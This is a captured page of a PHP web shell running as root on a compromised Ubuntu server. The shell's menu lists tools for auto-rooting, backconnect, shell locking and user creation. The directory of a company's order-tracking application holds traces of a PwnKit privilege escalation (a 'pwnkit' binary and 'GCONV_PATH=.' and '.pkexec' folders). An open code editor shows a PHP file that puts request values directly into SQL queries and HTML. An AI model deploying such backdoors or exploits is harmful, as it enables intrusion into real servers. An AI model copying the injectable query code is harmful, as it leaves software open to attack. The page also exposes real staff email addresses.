Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
Indicadores /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
500.shtml
71
B
-rwxrwxrwx
Almacen.php
2.44
KB
-rwxrwxrwx
IndicadoresCumplimiento.php
10.78
KB
-rwxrwxrwx
Notificacion.php
812
B
-rwxrwxrwx
Pedidos Cerrados Cumplidos.php
2.36
KB
-rwxrwxrwx
PedidosCerradosCumplidos.php
3.21
KB
-rwxrwxrwx
PedidosCerradosCumplidosA.php
2.8
KB
-rwxrwxrwx
PedidosCerradosNoCumplidos.php
3.2
KB
-rwxrwxrwx
PedidosEnProceso.php
3.22
KB
-rwxrwxrwx
PedidosNuevos.php
3.35
KB
-rwxrwxrwx
PedidosRecibidosconRetrasos.ph...
2.77
KB
-rwxrwxrwx
PedidosVencidos.php
3.15
KB
-rwxrwxrwx
PedidosporllegardeProduccion.p...
2.58
KB
-rwxrwxrwx
Planeacion.php
4.35
KB
-rwxrwxrwx
Produccion.php
2.62
KB
-rwxrwxrwx
ResumenAlmacen.php
5.75
KB
-rwxrwxrwx
ResumenPedidos.php
14.49
KB
-rwxrwxrwx
ResumenProduccion.php
8.94
KB
-rwxrwxrwx
UnicuadroSeleccion.php
6.58
KB
-rwxrwxrwx
acceso.php
1.36
KB
-rwxrwxrwx
class.phpmailer.php
88.75
KB
-rwxrwxrwx
class.smtp.php
30.33
KB
-rwxrwxrwx
comprobar.php
1.51
KB
-rwxrwxrwx
conexion.php
396
B
-rwxrwxrwx
correo.php
537
B
-rwxrwxrwx
email2.php
810
B
-rwxrwxrwx
email3.php
1.99
KB
-rwxrwxrwx
enviar.php
3.35
KB
-rwxrwxrwx
enviar_Almacen.php
2.27
KB
-rwxrwxrwx
enviar_produccion.php
2.51
KB
-rwxrwxrwx
error_log
8.33
MB
-rwxrwxrwx
favicon.ico
43
B
-rwxrwxrwx
index.php
4.13
KB
-rwxrwxrwx
login.php
260
B
-rwxrwxrwx
logout.php
210
B
-rwxrwxrwx
mail.php
309
B
-rwxrwxrwx
modificacion.php
9.52
KB
-rwxrwxrwx
modificacion2.php
5.57
KB
-rwxrwxrwx
modificar_almacen.php
5.6
KB
-rwxrwxrwx
modificar_produccion.php
6.48
KB
-rwxrwxrwx
perfil.php
806
B
-rwxrwxrwx
permisos.php
1021
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
registro.php
3.97
KB
-rwxrwxrwx
sugerencias_send.php
4.85
KB
-rwxrwxrwx
test.php
120
B
-rwxrwxrwx
tiempo.php
385
B
-rwxrwxrwx
unicuadro.php
3.96
KB
-rwxrwxrwx
unicuadromodificacion.php
3.56
KB
-rwxrwxrwx
usuarios.php
611
B
-rwxrwxrwx
validar_usuario.php
1.92
KB
-rwxrwxrwx
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modificar_almacen.php
<?php session_start(); include ("class.phpmailer.php"); include ("correo.php"); require ("conexion.php"); $today = date("Y-m-d"); $ipvisitante = $_SERVER["REMOTE_ADDR"]; $usuariom = $_SESSION['usuario_nombre']; $usuarionc = $_SESSION['NombreCompleto']; $usuarioc = $_SESSION['usuario_email']; $Perfil=$_SESSION['Perfil']; if (isset($_SESSION['usuario_nombre'])) { if ($Perfil==1 or $Perfil==6){ $pedido=$_GET['Pedido']; $OK = true; if (isset($_GET['Pedido'])) { $result = mysqli_query($enlace, "SELECT * FROM almacen WHERE Pedido = '$pedido'"); ($row = mysqli_fetch_array($result)); if (empty($row)) { $result = "No se encontraron resultados !!"; } } if (array_key_exists('update', $_POST)) { $Fecha_REA = $_POST['Fecha_REA']; $Observaciones = $_POST['Observaciones']; $OK = (array($_POST['Fecha_REA'], $_POST['Observaciones'],$_GET['Pedido'])); if (!$OK) { echo $error[2]; } else { $meter = mysqli_query($enlace,"UPDATE almacen SET Fecha_REA = '$Fecha_REA', Observaciones = '$Observaciones', IP = '$ipvisitante', usuariom = '$usuariom' WHERE Pedido = '$pedido'"); if($meter){ header("refresh: 2;ResumenAlmacen.php"); echo 'He modificado la Recepcion del Pedido Numero '.$pedido.'. '; $mail->From = "planeacion@insepet.com"; $mail->FromName = "Planeacion Produccion Insepet"; $mail->Subject = "Se modifico la fecha de Recepcion del Pedido Numero $pedido"; $mail->AltBody = "Correo Planeacion"; $mail->MsgHTML("<b>Se ha modificado la recepcion del pedido numero $pedido</b>. <BR>La Fecha de recepcion en almacen es: $Fecha_REA. <BR>El pedido $pedido se ha recibido bajo las siguientes observaciones: <BR><b>$Observaciones.</b> <BR> <BR> <BR>Att: $usuarionc. <BR>Sistema de Planificacion de Pedidos Insepet Ltda"); //$mail->AddAttachment("files/files.zip"; //$mail->AddAttachment("files/img03.jpg"; $mail->AddAddress("aleida.acuna@insepet.com", "Aleida Acuña"); $mail->AddCC($usuarioc); $mail->IsHTML(true); if(!$mail->Send()) { echo "Error: " . $mail->ErrorInfo; } else { echo "Mensaje enviado correctamente"; } } else { echo 'Ha existido un problema por favor vuelta a intentarlo.'; header("refresh: 2;modificar_almacen.php?Pedido=".$_GET['Pedido']); } exit; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>ModificacionAlmace</title> <meta http-equiv="X-UA-Compatible" content="IE=9,crome" /> <meta name="copyright" content="Datasoft Engineering 2013"/> <meta name="author" content="Javier Martinez" /> <meta name="email" content="ibarragan@behstant.com"/> <meta name="description" content="ModificacionPlaneacion" /> </head> <?php if(!$OK) : echo ""; else : ?> <fieldset style="width:480px" > <legend>Editar Pedido</legend> <form action="" method="post"> <table> <tr> <td><label for="id">Pedido:</label></td> <td><input type="text" name="Pedido" id="Pedido"/ disabled="disabled" value="<?php echo $row['Pedido'];?>"></td> </tr> <tr> <td><label for="Fecha_REA">Fecha Recibido Almacen:</label></td> <td><input type="date" name="Fecha_REA" id="Fecha_REA" value="<?php echo $row['Fecha_REA'];?>"/></td> </tr> <tr> <td><label for="Observaciones">Observaciones:</label></td> <td><input type="text" name="Observaciones" id="Observaciones" value="<?php echo $row['Observaciones'];?>"/></td> </tr> <tr> <td><input type="submit" name="update" value="Actualizar"/></td> <td><input type="submit" name="delete" value="Eliminar" disabled="disabled"/></td> </tr> </table> </form> </fieldset> <p><a href="ResumenAlmacen.php"><< Regresar</a></p> <?php endif;?> <body> </html> <?php $FECHAOLD=$_SESSION['UltimoIngreso']; $HORA=date('Y-n-j H:i:s'); $tiempo=(strtotime($HORA) - strtotime($FECHAOLD)); if($tiempo>=600){ session_destroy(); echo '<script language=javascript> alert ("su session a sido caducada por su seguridad, por favor ingrese nuevamente.") self.location="index.php"</script>'; }else{ $_SESSION['UltimoIngreso']=$HORA; } }else{ echo 'El usuario no tiene los permisos suficientes para acceder a la web'; mysqli_close($enlace); //Cerramos la conexion a la db } } else{ echo 'El usuario no tiene acceso a esta pagina web comuniquese con el administrador del sistema'; mysqli_close($enlace); //Cerramos la conexion a la db } ?>
Close